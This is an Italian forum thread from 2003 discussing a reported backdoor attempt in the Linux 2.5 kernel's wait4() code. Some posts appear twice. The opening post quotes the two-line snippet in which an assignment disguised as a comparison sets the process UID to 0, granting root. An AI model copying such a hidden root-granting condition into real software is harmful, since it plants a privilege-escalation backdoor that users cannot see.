Kernel Linux 2.5: bug o backdoor?

**Ziosilvio** · 16-11-2003, 16:19

Ciao a tutti.
E' un po' vecchiotta, ma preoccupante.

Pare che, in Linux 2.5, abbiano trovato il seguente codice nella chiamata wait4():

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

Avete letto bene?
Questo codice, se sono sollevati i flag __WCLONE e __WALL, cambia l'UID del processo corrente in modo da farlo operare con i privilegi di root .
Per fortuna se ne sono accorti in tempo...

Sarà una svista?

O sarà un tentativo di sabotaggio?

Ho trovato la notizia qui .

A risentirvi.

NA01 · 16-11-2003, 16:29

l'importante è che sia stato trovato!
a dimostrazione che spesso l'open source funziona

Cimi · 16-11-2003, 20:26

e che se il tipo che lo scopre nn lo dice a nessuno può far danni quanto gli pare!

ilsensine · 17-11-2003, 07:43

http://forum.hwupgrade.it/showthread...hreadid=559885

**Ziosilvio** · 17-11-2003, 10:30

Quote:

Originariamente inviato da ilsensine
http://forum.hwupgrade.it/showthread...hreadid=559885

Grazie, avevo letto anche quello.
Ma parla di una modifica alla exit(), mentre quella che avevo segnalato io e' relativa alla wait4().
Piuttosto, e' importante (ri)segnalare che il thread di sviluppo non era quello principale.

A proposito: il link alla segnalazione sulla exit() e' cambiato (l'articolo e' stato inserito nell'archivio), ora la pagina e' qui.

ilsensine · 17-11-2003, 10:32

Quote:

Originariamente inviato da Ziosilvio
Ma parla di una modifica alla exit(), mentre quella che avevo segnalato io e' relativa alla wait4().

Umm la pagina è cambiata da quando Gurutech l'ha postata; parlava esattamente della wait4.

ilsensine · 17-11-2003, 10:33

Quote:

Originariamente inviato da Ziosilvio
A proposito: il link alla segnalazione sulla exit() e' cambiato (l'articolo e' stato inserito nell'archivio), ora la pagina e' qui.

La sys_wait4 è implementata nel file kernel/exit.c

**Ziosilvio** · 17-11-2003, 11:20

Quote:

Originariamente inviato da ilsensine
La sys_wait4 è implementata nel file kernel/exit.c

Il che spiega tutto.
Ho letto meglio: era il file exit.c, non la funzione exit().
Per cui mi sa che la vulnerabilita' era proprio quella dell'altro thread.
Grazie mille.

16-11-2003, 16:19	#1
Ziosilvio Moderatore Iscritto dal: Nov 2003 Messaggi: 16211	Kernel Linux 2.5: bug o backdoor? Ciao a tutti. E' un po' vecchiotta, ma preoccupante. Pare che, in Linux 2.5, abbiano trovato il seguente codice nella chiamata wait4(): if ((options == (__WCLONE\|__WALL)) && (current->uid = 0)) retval = -EINVAL; Avete letto bene? Questo codice, se sono sollevati i flag __WCLONE e __WALL, cambia l'UID del processo corrente in modo da farlo operare con i privilegi di root . Per fortuna se ne sono accorti in tempo... Sarà una svista? O sarà un tentativo di sabotaggio? Ho trovato la notizia qui . A risentirvi.

16-11-2003, 20:26	#3
Cimi Senior Member Iscritto dal: May 2002 Città: Padua, Italy Messaggi: 3288	e che se il tipo che lo scopre nn lo dice a nessuno può far danni quanto gli pare! __________________ http://www.cimitan.com Molte trattative, sempre positive!

17-11-2003, 07:43	#4
ilsensine Senior Member Iscritto dal: Apr 2000 Città: Roma Messaggi: 15625	http://forum.hwupgrade.it/showthread...hreadid=559885 __________________ 0: or %edi, %ecx; adc %eax, (%edx); popf; je 0b-22; pop %ebx; fadds 0x56(%ecx); lds 0x56(%ebx), %esp; mov %al, %al andeqs pc, r1, #147456; blpl 0xff8dd280; ldrgtb r4, [r6, #-472]; addgt r5, r8, r3, ror #12

16-11-2003, 16:29	#2
NA01 Senior Member Iscritto dal: Jun 2003 Città: Genova Messaggi: 5676	l'importante è che sia stato trovato! a dimostrazione che spesso l'open source funziona

Strumenti
Mostra una versione stampabile Invia questa pagina per email